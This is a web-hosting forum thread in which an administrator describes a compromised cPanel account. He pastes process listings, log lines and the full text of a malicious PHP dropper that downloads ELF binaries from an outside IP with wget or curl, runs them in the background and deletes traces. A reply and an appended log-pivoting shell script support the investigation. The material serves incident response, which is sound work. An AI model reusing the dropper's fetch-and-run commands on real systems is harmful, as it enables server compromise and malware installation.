Strange programs running on server

jimhermann

Folks,

How do I determine what these strange programs have been doing on my server?

root 9771 0.0 0.0 20164 1164 ? Ss Mar22 0:00 jailshell (username) [9817] l -c /home/username/public_html/Linux_amd64 > /dev/null 2>&1
username 9817 0.0 0.0 20164 268 ? S Mar22 0:42 jailshell (username) [init] l -c /home/jimhermann/public_html/Linux_amd64 > /dev/null 2>&1

They were saved to the hard drive by the 550.php script. I ran chmod 000 after I found them.

----------. 1 username username 2228748 Mar 16 05:11 Linux_x86
----------. 1 username username 2377240 Mar 16 05:11 Linux_amd64
----------. 1 username username 453 Mar 22 08:49 550.php

It looks like files 412.php and 550.php were uploaded first before March, then 550.php was executed via http on March 22.

# more 550.php
<?php
system('wget "http://82.165.106.79/Linux_x86" 2>/dev/null || curl -O "http://82.165.106.79/Linux_x86"');
system('chmod 777 ./Linux_x86');
system('nohup ./Linux_x86 2>&1 &');
system('ps aux|stealth');

system('wget "http://82.165.106.79/Linux_amd64" 2>/dev/null || curl -O "http://82.165.106.79/Linux_amd64"');
system('chmod 777 ./Linux_amd64');
system('nohup ./Linux_amd64 2>&1 &');
system('ps aux|grep stealth');

system('rm -rf 412.php');
?>

# grep 93.41.203.52 username.com-ssl_log-Mar-2022
93.41.203.52 - - [22/Mar/2022:09:25:57 -0500] "GET /550.php HTTP/1.1" 200 250 "-" "curl/7.52.1"

Imunify AV+ reported that the Linux_amd64 file was infected with SMW-BLKH-1421002-elf.troj

Thanks,

Jim
 

cPRex

Hey there! The good news is that the compromise only appears to be at the user level, as the files were owned by the cPanel user and not root. If you do a search for "Linux_amd64 malware" you'll see many references to that tool, mostly about trying to capture network traffic to get sensitive data.
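
One way to extend the single-IP grep from the first post, as an added example that is not part of the thread: collect every client that requested the dropper scripts, then list everything else those clients did, which is where an earlier upload request would show up. The log lines are constructed (documentation-range addresses, hypothetical /forms/upload.php), and the function names are assumptions.

```shell
#!/bin/sh
# Added example: pivot an Apache combined-format access log around dropper scripts.
# Fields used: $1 client IP, $4 [timestamp, $6 "METHOD, $7 path, $9 status.

# suspect_ips LOG REGEX -> unique client IPs that requested a path matching REGEX
suspect_ips() {
    awk -v re="$2" '$7 ~ re { print $1 }' "$1" | sort -u
}

# pivot_requests LOG REGEX -> every request from those IPs, in log order,
# printed as "timestamp ip method path status"
pivot_requests() {
    awk -v re="$2" '
        NR == FNR { if ($7 ~ re) seen[$1] = 1; next }  # pass 1: collect IPs
        ($1 in seen) {                                  # pass 2: their full history
            sub(/^\[/, "", $4)                          # strip leading [ from timestamp
            sub(/^"/, "", $6)                           # strip leading quote from method
            print $4, $1, $6, $7, $9
        }' "$1" "$1"
}

# Constructed sample log; not taken from the server in the thread.
write_sample_log() {
    cat <<'EOF'
198.51.100.20 - - [10/Feb/2022:03:14:07 -0500] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Feb/2022:05:10:41 -0500] "POST /forms/upload.php HTTP/1.1" 200 31 "-" "python-requests/2.25"
203.0.113.7 - - [16/Feb/2022:05:10:44 -0500] "GET /412.php HTTP/1.1" 200 12 "-" "python-requests/2.25"
198.51.100.20 - - [21/Mar/2022:18:02:11 -0500] "GET /contact.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.99 - - [22/Mar/2022:09:25:57 -0500] "GET /550.php HTTP/1.1" 200 250 "-" "curl/7.52.1"
EOF
}

# Demo: match /412.php or /550.php, with or without a query string.
log=$(mktemp)
write_sample_log > "$log"
pivot_requests "$log" '^/(412|550)[.]php([?]|$)'
rm -f "$log"
```

On a real server, run both functions over each monthly log for the account, since the thread suggests the upload happened before the month in which 550.php was requested.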